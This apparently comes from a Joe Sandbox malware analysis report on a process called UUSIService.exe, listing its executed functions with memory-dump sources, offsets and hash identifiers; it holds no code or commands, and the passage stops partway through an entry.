Opcode ID: 53eb1922e0fa9bf7d41b5ce529a3af46b8b49e19f82e500664ca8b43cf2588f5
Instruction ID: c9b95332b2c468725e60c971b0511ffbf3a169fbcb324dfcbb32b71112958e7e
Opcode Fuzzy Hash: 53eb1922e0fa9bf7d41b5ce529a3af46b8b49e19f82e500664ca8b43cf2588f5
Instruction Fuzzy Hash: DE118E32D017499ACB01CFB9E8404DDFFB1AF99310F2547A6E111B7650E770254ACB61

Function 022A0989 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2345884513.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_22a0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 198c7ea5aecddb49b7de24be787b51581577975ed3ae83e1534ead225f891fe1
Instruction ID: d9b9f368f50e79914c32aa832f316ef6752d721b27ca9fb71c832f52355c92e5
Opcode Fuzzy Hash: 198c7ea5aecddb49b7de24be787b51581577975ed3ae83e1534ead225f891fe1
Instruction Fuzzy Hash: 39114C34560206CFCB86FFB8E854958BFB1FB843007108AA9D441EB23AEB709946CF41

Function 022A0879 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2345884513.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_22a0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8082d4a3d5cc026ba1fc292b8be81e3e1584a29426481ec836809200f20ddc9
Instruction ID: e0626bb61743a5f515e3e5755b1dd4fe70eb2b10d5026af6c2ad260beeff991f
Opcode Fuzzy Hash: f8082d4a3d5cc026ba1fc292b8be81e3e1584a29426481ec836809200f20ddc9
Instruction Fuzzy Hash: C8019E32D1464A9BCB01CBB9DC000DDBBB2EFDA310F1686A7D211B7560EB74254EC7A1

Function 00A1D1C5 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2345617769.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a1d000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1645b1b052352a2623d4a81f27e6efd7446cf308260a16054216aab407d3daa6
Instruction ID: 733e1a5e2961d41c6363de7205f1ab0f0299ae6279300f10307529eb97753365
Opcode Fuzzy Hash: 1645b1b052352a2623d4a81f27e6efd7446cf308260a16054216aab407d3daa6
Instruction Fuzzy Hash: F801A231404345AAE7218B65D984BE7FBACEF45324F18C56AED194A282C279D885C672

Function 022A0CD0 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2345884513.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_22a0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30af09a2d39bfdc4a7fcf13bfcf7205b8920ce0f818fd78af7af4fa8d6811550
Instruction ID: 06d0251b3d7152fb57a88690c2e5ded2cf33640a6ddd77b03a5074f1b80172de
Opcode Fuzzy Hash: 30af09a2d39bfdc4a7fcf13bfcf7205b8920ce0f818fd78af7af4fa8d6811550
Instruction Fuzzy Hash: 96011E32D1060EABCB00DFBAE8404DDFBB5EF99320F258766E51577650E774258ACB60

Function 022A0998 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2345884513.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_22a0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 404e9d1b39744383da87043a19920b1b7db2e10720eb4384873d7cebeaccc1af
Instruction ID: 6affbb8eaf226009ab87b717b7b300cb1122fc1529459cf10615131a8d14e624
Opcode Fuzzy Hash: 404e9d1b39744383da87043a19920b1b7db2e10720eb4384873d7cebeaccc1af
Instruction Fuzzy Hash: 05111C38560206CFCB85FFB8E89495CBBF1FB443007108A68D501AB23AEB70AD46CF81

Function 022A0901 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2345884513.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_22a0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62c309f97002a261ffefd962b709530d98030dfc058aa22fa36a32cc6329e25a
Instruction ID: c0b8da6aa057928a1581c9473f6a2b97ae28e46d6c63ada65ec1dbaa5f32833e
Opcode Fuzzy Hash: 62c309f97002a261ffefd962b709530d98030dfc058aa22fa36a32cc6329e25a
Instruction Fuzzy Hash: BFF04C31914189DFDB15CBB4C864AEFBFB15F94300F04492ED002B7241DE705607C782

Function 00A1D1C4 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2345617769.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a1d000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc0f4931311accafc71373c851d2205ca62d46f94476d446b22d3a2b139a0af4
Instruction ID: 5c9fcb5fca597eeead566ce0561b5919a3c8f13814a54ee1b6fcd93bdf6708e5
Opcode Fuzzy Hash: cc0f4931311accafc71373c851d2205ca62d46f94476d446b22d3a2b139a0af4
Instruction Fuzzy Hash: 2BF06D71405344AEE7108F1AD884BA6FFA8EB95724F18C45AED184A286C379AC84CAB1

Function 022A0D51 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2345884513.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_22a0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39ce727f5a2f0230b67b3a1012aa359c821b2753398ea91101e8d415c125d782
Instruction ID: a8b03ff0c90690067ad55efdb70162d2036fbf047327b1c8cbef99f4c459d0c4
Opcode Fuzzy Hash: 39ce727f5a2f0230b67b3a1012aa359c821b2753398ea91101e8d415c125d782
Instruction Fuzzy Hash: 94F0FC32D15285CBDF15DBB4C865AEFBFB19F84300F04452AD502BB280DEB01506C7C2

Function 022A0910 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2345884513.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_22a0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a9187e8851292e4a4e7ddf172efdd197dac801f820e600c99ef7f805a271835
Instruction ID: 719fb122bf5ca25fb42e1cbdf8595c0c07525fc91e4ff0d1827aa0593e59d6ec
Opcode Fuzzy Hash: 8a9187e8851292e4a4e7ddf172efdd197dac801f820e600c99ef7f805a271835
Instruction Fuzzy Hash: 73F08972A1014AD7DF14DBA4C965AEFBBB69F84700F054925D502B7340DEB06906C7D1

Function 022A1798 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2345884513.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_22a0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 064fc9617f1b70a939f22dc82d89412ce152590a92596bdb5df953c569c4d962
Instruction ID: a08f042d35f7b379df8970e076ec3c2b15077938ac44806d132fa7e7bd8686eb
Opcode Fuzzy Hash: 064fc9617f1b70a939f22dc82d89412ce152590a92596bdb5df953c569c4d962
Instruction Fuzzy Hash: 73D02B313143144BCF2866F4682066A33DA8FC4765B00447ED20DC7B44DA32C80087C4

Function 022A0838 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2345884513.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_22a0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 812791cf337cd9168eeb31b8af22ae011a23dc5740f996790f0b6f82f5e94be6
Instruction ID: 989e00e8a2ff28f7198d815c41c72e901d2a8bab04d51763553ff4a4a25bfe52
Opcode Fuzzy Hash: 812791cf337cd9168eeb31b8af22ae011a23dc5740f996790f0b6f82f5e94be6
Instruction Fuzzy Hash: 1DE0DF71805244DFDB11CFB8840079CBFB0BB01240F2602CAD489C7602C7318A12CB41

Function 022A0848 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2345884513.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_22a0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 379bea22a4584758bb60b47a80b462425371a4dad68eee88ec10fc2d11bc7dfd
Instruction ID: f6d1015b9a0cd9a167808da8ddd9b7c8e1c086bcdcd6c6d1894050bd817a0407
Opcode Fuzzy Hash: 379bea22a4584758bb60b47a80b462425371a4dad68eee88ec10fc2d11bc7dfd
Instruction Fuzzy Hash: 3AD01772905209EFEB11CFE8C80579D7BB8BB05280F660496E448D7605DA319E51C795

Function 022A1791 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2345884513.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_22a0000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0ce53b588e736a19a30b1a7d619a7cffa06412cded3694b58ef6cd2373be055
Instruction ID: a274d0292a609326b8cfebc9f87547b5a44b164d2e97bb28ca0bc18018cd47ba
Opcode Fuzzy Hash: e0ce53b588e736a19a30b1a7d619a7cffa06412cded3694b58ef6cd2373be055
Instruction Fuzzy Hash: 42D0227162D2940FCB2601B42C304F92B948941364B0402BFD509D1A62D2A684038740

Analysis Process: UUSIService.exePID: 4560, Parent PID: 4004COMMON

Executed Functions

Function 02510DE8 Relevance: .4, Instructions: 374COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2561279217.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2510000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 554558e35e747d6c18775611a6545493cc551dfc83de7ce731aa9fe57e271407
Instruction ID: e47c3e5564b87e35015496d5ffc260b1ef4ad5af2bd73e08223dff88c530e10c
Opcode Fuzzy Hash: 554558e35e747d6c18775611a6545493cc551dfc83de7ce731aa9fe57e271407
Instruction Fuzzy Hash: A5F1E435A002498FDB05DFA9C484ADCBBF2BF49320F199195E845BB3A2D731AD85CF64

Function 02511509 Relevance: .3, Instructions: 297COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2561279217.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2510000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae6a87ee18c9df92e33dbbb3d7f837720747705d1fa3414725de27a977a2df7c
Instruction ID: 20607efa8a3b7ef7248d5fc7e3010a472a1511c843c6bebab32700b6f98bac2b
Opcode Fuzzy Hash: ae6a87ee18c9df92e33dbbb3d7f837720747705d1fa3414725de27a977a2df7c
Instruction Fuzzy Hash: DAF0F0312083819FD7036B789C249AA7FE2EEC365070845EBE149CF292DF689C06C7D1

Function 02510B28 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2561279217.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2510000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3f53a16e0611902328e0e4389883d0c58b4aa9f550565a361db1aad5e38d3f9
Instruction ID: 5866179b8454774826793e44eca9508d1764ea3312c7887b95f05726c1e0351b
Opcode Fuzzy Hash: c3f53a16e0611902328e0e4389883d0c58b4aa9f550565a361db1aad5e38d3f9
Instruction Fuzzy Hash: 2A41C570A04755CFEB26DF24D84069EBBF1FF89340F14465AD896EB2A1D734A848CF51

Function 02510A60 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2561279217.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2510000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d682807da84de9eba209e2638439a75635cf4093c08af1f8e33155d412d581f8
Instruction ID: c1083b3fa22b94e7ffe209e0b38f56cd5ee2d1c9f52908dcc0ab7722ec138925
Opcode Fuzzy Hash: d682807da84de9eba209e2638439a75635cf4093c08af1f8e33155d412d581f8
Instruction Fuzzy Hash: F92124343005418FD745AB39D858A297BE6FF8AA11B6640E9E50ACB3B2CE71DC068B91

Function 02510A70 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2561279217.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2510000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b000b8c6cde0607ad60ca5f26b7b1a90d7cf865fec9103e3d5b41ba4a9c9cf5e
Instruction ID: f290cff44b83125eeb273023c3a0190d14e9782528782710568463de7a4c5f77
Opcode Fuzzy Hash: b000b8c6cde0607ad60ca5f26b7b1a90d7cf865fec9103e3d5b41ba4a9c9cf5e
Instruction Fuzzy Hash: B41107343104158FC744EB39D499A2D7BE6FFCDA1076540A9E50ACB376DE71EC058B91

Function 02510E79 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2561279217.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2510000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5086b4d0479787ab54fd00d0eae25d2315f0181a2ab82ec01d882fd4c3b250b9
Instruction ID: fa219eb95834b0601942f5a3e99e0a57b2b178b77db244349d9162222417f61f
Opcode Fuzzy Hash: 5086b4d0479787ab54fd00d0eae25d2315f0181a2ab82ec01d882fd4c3b250b9
Instruction Fuzzy Hash: 6E217E35A002488FDB05DFA9D484ADCBBF2FF89220F199095E905BB361D731AD95CF60

Function 02510CC0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2561279217.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2510000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67948fe84db46b630c1bfc8038c5f7513c8709d66cc446e82fc103feca036cd9
Instruction ID: b55d4f867d545c2e5ea130cef1bd9fafaf35d9d173cd04a1b96060a9ea95831a
Opcode Fuzzy Hash: 67948fe84db46b630c1bfc8038c5f7513c8709d66cc446e82fc103feca036cd9
Instruction Fuzzy Hash: 3111A132D00749ABDB01DFB9E8405DDFFB1EF9A310F1686A6E110B7650E774298ACB61

Function 02510989 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2561279217.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2510000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80ad58bb2f003b48d003a48eff46c71ec8a253c83b4ced2e0e120420bbba627d
Instruction ID: 7d679b8b58f9b2063dfadf0c79b5b62ca30ba259d400b1b60edfa2a23d25a10c
Opcode Fuzzy Hash: 80ad58bb2f003b48d003a48eff46c71ec8a253c83b4ced2e0e120420bbba627d
Instruction Fuzzy Hash: 5D112B78514206CFEB06FF74EC94A6DBBB1FB84301B1186A9D501CB269EB349946CF80

Function 02510879 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2561279217.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2510000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8340a9e07d742d38efeb80ca1740df849dd0ff8aa851d05e9629551cde897909
Instruction ID: fbb7aa580442af5c602318d22f59f29201fedd169685de55679799a090e42f6b
Opcode Fuzzy Hash: 8340a9e07d742d38efeb80ca1740df849dd0ff8aa851d05e9629551cde897909
Instruction Fuzzy Hash: A9019232D0464A9FCB019BB9DC004DDBB72EFCA310F168692D111B7560EB70258ECBA1

Function 00BFD1C5 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2560977221.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_bfd000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c72879b4e33690864b1e5879bdd7e99fc6784fc03c1fbb65567bc4d306225d5
Instruction ID: ae8e0f7708dc7d30d043742411fb1041e4d6bc0abadd1abdc413ac8f58ba729e
Opcode Fuzzy Hash: 2c72879b4e33690864b1e5879bdd7e99fc6784fc03c1fbb65567bc4d306225d5
Instruction Fuzzy Hash: C401F2311043489AE7218A29DDC4B77FBE9EF41320F18C49AEE090B282C279D849C6B2

Function 02510CD0 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2561279217.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2510000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8163497bb35718697f720920c48989a9c2053467a31dc59930faa4dfb953fb95
Instruction ID: 6f418c3a035b0faaed2bf84dff4a78475b974b7d2f19c45a9556cf755b1eb310
Opcode Fuzzy Hash: 8163497bb35718697f720920c48989a9c2053467a31dc59930faa4dfb953fb95
Instruction Fuzzy Hash: 16011E32D1060EABCB00DFBAD8404DDFBB5EF99320F258766E11577650E774259ACB60

Function 02510998 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2561279217.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2510000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afd86e9fa206b899dfefca3031da57cb2da828e09ee194f6f825eb56b379b8ac
Instruction ID: fc1d8447183c340213f71e1d772ecec209a2fc31ad08c7feed7e71984fce0be4
Opcode Fuzzy Hash: afd86e9fa206b899dfefca3031da57cb2da828e09ee194f6f825eb56b379b8ac
Instruction Fuzzy Hash: 9111E87850010ADFEB09FF74EC98A6DBBB1FB84301B108669D50597269EB34AA46CF80

Function 02510D51 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2561279217.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2510000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 128eddd3d10b539632193565199b81f44d524486aa9ba8743a9a9da893f581ba
Instruction ID: 549fa3ce1c63f1c74e21fc4b78b255cd90651617f797ddea8660666deb048cbd
Opcode Fuzzy Hash: 128eddd3d10b539632193565199b81f44d524486aa9ba8743a9a9da893f581ba
Instruction Fuzzy Hash: 40F02831A00245CBEF059B74CC65BEF7FB19F45300F044825C502B7280DEB55906C7C2

Function 02510901 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2561279217.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2510000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53c5cd6aed457b9ed7ffcdedd7c3ce958ab1484226e371df36d0184d2cfc0192
Instruction ID: 917b82fb5fbf5e4f69f93d1e06efbcd3a31c7a2181e8704d6e79e34095a7387f
Opcode Fuzzy Hash: 53c5cd6aed457b9ed7ffcdedd7c3ce958ab1484226e371df36d0184d2cfc0192
Instruction Fuzzy Hash: 25F07871A042898BEB05DB74CC60AEF7FA25F81300F05492AD402BB280DF704902C7C2

Function 00BFD1C4 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2560977221.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_bfd000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 571c01bcbc0a0901ceed94d53dcef01169fb0621da4f679d25fc05bca4170809
Instruction ID: 7f07d817da998f65e412d57b352ef00fca469808e4bd55913700850b677bdc6d
Opcode Fuzzy Hash: 571c01bcbc0a0901ceed94d53dcef01169fb0621da4f679d25fc05bca4170809
Instruction Fuzzy Hash: FDF0C271404348AAE7108E15DCC4B62FFE8EB40725F18C09AEE080F682C2799C44CAB1

Function 02510910 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2561279217.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2510000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79040642a66c835c64d2deda4efb817f9ce2880d62ff267deda6d491a0610d06
Instruction ID: 2ed0c040cb43991ffa3327140e2c1619c97d319fadc98183a5b791289e11340e
Opcode Fuzzy Hash: 79040642a66c835c64d2deda4efb817f9ce2880d62ff267deda6d491a0610d06
Instruction Fuzzy Hash: 9BF08272A1014A97EF04DBA4C965AEFBBB69F84300F058926D502BB380DEB06906C7D5

Function 02510838 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2561279217.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2510000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1579d2d33a73f8d79f7c377e3a65a735f7206720cb57272ca7bb45fc209c6178
Instruction ID: 1331757c7288ef14a40ad100090f3061ceed3778096fdd7164ed5f70ba85fe56
Opcode Fuzzy Hash: 1579d2d33a73f8d79f7c377e3a65a735f7206720cb57272ca7bb45fc209c6178
Instruction Fuzzy Hash: 9BE092A1909784EFE703DFB8C81079D7FE0AB03241F5601C6D488CB152D7358D51C792

Function 02511798 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2561279217.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2510000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35238a4eb574ac457a2f0de3753bc23d0702e1e8602167b4f856c9298b0fa3a2
Instruction ID: 93cba191d7b49c44e97d4942660e6f22f153af97e27851a61258a48fbe5a3e7e
Opcode Fuzzy Hash: 35238a4eb574ac457a2f0de3753bc23d0702e1e8602167b4f856c9298b0fa3a2
Instruction Fuzzy Hash: BBD02B313043155BDF2962B8A80056A33DAAFC4365700447ED60DC7380DD32C84087C8

Function 02510848 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2561279217.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2510000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 946274aeb48955a0c262a4bf894c58aa8e1b2d95baa83915d120b305ff62adca
Instruction ID: a63677aaa5af5223c5412de0ea74c43df9e90e8d37f718f81527b237138ce7f2
Opcode Fuzzy Hash: 946274aeb48955a0c262a4bf894c58aa8e1b2d95baa83915d120b305ff62adca
Instruction Fuzzy Hash: CBD017B2905208EFEB01DFA4C80575DBBB8BB05280F664496E848D7241DA319E50C795

Function 02511788 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2561279217.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_2510000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ff07a421729ee4e4b693f9408e219f4999d58162750e9413f366dfac4faf4ad
Instruction ID: 2f915571fbd98ec3f150b53dc20e6aa575bcc239ea8b31862099bd14ac59c22c
Opcode Fuzzy Hash: 9ff07a421729ee4e4b693f9408e219f4999d58162750e9413f366dfac4faf4ad
Instruction Fuzzy Hash: E4D0A93120E3904EFB0B02742E600562FAA5E8216830A00FBC548CABB3E524C844CB69

Analysis Process: UUSIService.exePID: 1052, Parent PID: 4004COMMON

Executed Functions

Function 02530DE8 Relevance: .4, Instructions: 374COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2640468282.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2530000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5afbee8cb2f71bf1c705a8268856858b31670812ae11e57ca13a1673bf9c35f0
Instruction ID: 58742f535a2ef301c2eca4be3f3ce4129982347044be1ac42352cb59f9ef6ff7
Opcode Fuzzy Hash: 5afbee8cb2f71bf1c705a8268856858b31670812ae11e57ca13a1673bf9c35f0
Instruction Fuzzy Hash: 0AF1E475A002488FDB05DFA8C484ADCBBF6BF89320F189595E445BB362DB31AD85CF64

Function 02530DDA Relevance: .4, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2640468282.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2530000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfefe0438c17a2ec4385a23702d7edda4a86f666980b37b108e89174b04d2bf7
Instruction ID: 44345761043fa12868613d7a429aef9c9bbd86056325900d27b63144a67ff705
Opcode Fuzzy Hash: dfefe0438c17a2ec4385a23702d7edda4a86f666980b37b108e89174b04d2bf7
Instruction Fuzzy Hash: 2EF10475A002488FDB06CFA8C484ADDBBF6FF89320F199595E445AB362D731AD81CF64

Function 02531509 Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2640468282.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2530000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9be456676db514a2eb3e1f297415a0f746114885c7009b8e5213745dcbc8e15c
Instruction ID: 13f271d544c728767199591e6bf0534ba0bad198567e27d46eb700dab50bba0c
Opcode Fuzzy Hash: 9be456676db514a2eb3e1f297415a0f746114885c7009b8e5213745dcbc8e15c
Instruction Fuzzy Hash: 31F0F0316083406FC323677988118ABBBA7EEC265035484AAE546CB281DE20AC068BD5

Function 02530B28 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2640468282.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2530000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7a823de91bd29debc8d3ba26ecf539a6241962fecec238cadc071dac33174f3
Instruction ID: f6dd8c7d0b70139ba7c498240a324cba5ea27ca2fd270bc951e3bb58966a23a9
Opcode Fuzzy Hash: e7a823de91bd29debc8d3ba26ecf539a6241962fecec238cadc071dac33174f3
Instruction Fuzzy Hash: DC41B070A007598FDB26DF28D84069EBBF2FF88700F144A6AD496AB295D730A845CF55

Function 02530A60 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

